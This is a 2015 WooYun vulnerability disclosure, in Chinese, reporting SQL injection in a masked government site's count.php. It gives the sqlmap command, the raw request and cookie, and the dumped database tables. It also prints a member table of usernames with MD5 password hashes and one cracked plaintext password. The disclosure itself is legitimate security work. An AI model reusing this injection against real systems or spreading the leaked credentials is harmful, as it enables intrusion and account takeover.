乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-05: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-15: 细节向核心白帽子及相关领域专家公开 2015-09-25: 细节向普通白帽子公开 2015-10-05: 细节向实习白帽子公开 2015-10-20: 细节向公众公开
RT
注入数据包 sqlmap -r 1.txt
GET http://**.**.**.**/count.php?aid=1&v=2 HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/bencandy.php?fid=24&id=411Cookie: safedog-flow-item=C0519CA4971AEC40DBE3AD4F6135C8EA; USR=p9qlbuap%090%091440774349%09http%3A%2F%2F**.**.**.**%2Fbencandy.php%3Ffid%3D24%26id%3D411Connection: keep-alive
数据库
表段
Database: kmsafety [76 tables]+------------------------+| qb_ad_compete_place || qb_ad_compete_user || qb_ad_config || qb_ad_norm_place || qb_ad_norm_user || qb_admin_menu || qb_alonepage || qb_area || qb_article || qb_article_content_100 || qb_article_content_101 || qb_article_content_107 || qb_article_db || qb_article_module || qb_channel || qb_collection || qb_comment || qb_config || qb_copyfrom || qb_count || qb_crontab || qb_form_config || qb_form_content || qb_form_content_1 || qb_form_content_2 || qb_form_content_3 || qb_form_content_4 || qb_form_content_5 || qb_form_content_6 || qb_form_content_7 || qb_form_content_8 || qb_form_module || qb_form_reply || qb_friendlink || qb_friendlink_sort || qb_fu_article || qb_fu_sort || qb_gather_rule || qb_gather_sort || qb_group || qb_guestbook_config || qb_guestbook_content || qb_guestbook_sort || qb_hack || qb_jfabout || qb_jfsort || qb_keyword || qb_keywordid || qb_label || qb_limitword || qb_memberdata || qb_members || qb_menu || qb_module || qb_moneycard || qb_moneylog || qb_olpay || qb_pm || qb_propagandize || qb_regnum || qb_reply || qb_report || qb_shoporderproduct || qb_shoporderuser || qb_sort || qb_special || qb_special_comment || qb_spsort || qb_template || qb_template_bak || qb_upfile || qb_vote_comment || qb_vote_config || qb_vote_element || qb_vote_topic || qb_yzimg |+------------------------+
字段
Database: kmsafety Table: qb_members[3 columns]+----------+-----------------------+| Column | Type |+----------+-----------------------+| password | varchar(32) || uid | mediumint(7) unsigned || username | varchar(30) |+----------+-----------------------+
字段内容(帐号信息)
Database: kmsafetyTable: qb_members[16 entries]+-----+-------------+----------------------------------+| uid | username | password |+-----+-------------+----------------------------------+| 1 | admin | b8429f230195926887f39d96abe5cdec || 2 | test | 1bf3bdadeaa8ef65abffc83c6b4ebf7a || 3 | zhoutiao | 5c0d033b5455b89950a10b502a25199f || 4 | zrl123 | fc5b0146d4e5713cd82c2c64ba03b850 || 5 | zhengxiang | ad83aed946189b9af06939962bd432b3 || 6 | yangwenqian | b8429f230195926887f39d96abe5cdec || 7 | ywq | c04d550d456230e3f26cccbccfa7f084 || 8 | fmc | a069623fbad30b03eb8970cd7ca15ca7 || 9 | whc | 7a70dfcf15d4d8329a63c86c94a46289 || 10 | hgc | b5122c946cd0d3e0543beb007d854cb1 || 11 | zjc | 87a27359cb2bdb7d4f6001570ff5268a || 12 | fgc | c4ca4238a0b923820dcc509a6f75849b || 13 | yjb | c33367701511b4f6020ec61ded352059 || 14 | jczd | 88cb6a0e468edc75b0432d580501c9a4 || 15 | dzz | 62026aaed5419a1ceaa229bf6886443e || 16 | bgsgly | ee1757e2f9c492197dff67860a9940e4 |+-----+-------------+----------------------------------+
破解出其中一帐号密码zhoutiao/zhoutiao123
过滤参数
危害等级:中
漏洞Rank:10
确认时间:2015-09-05 08:38
CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。
暂无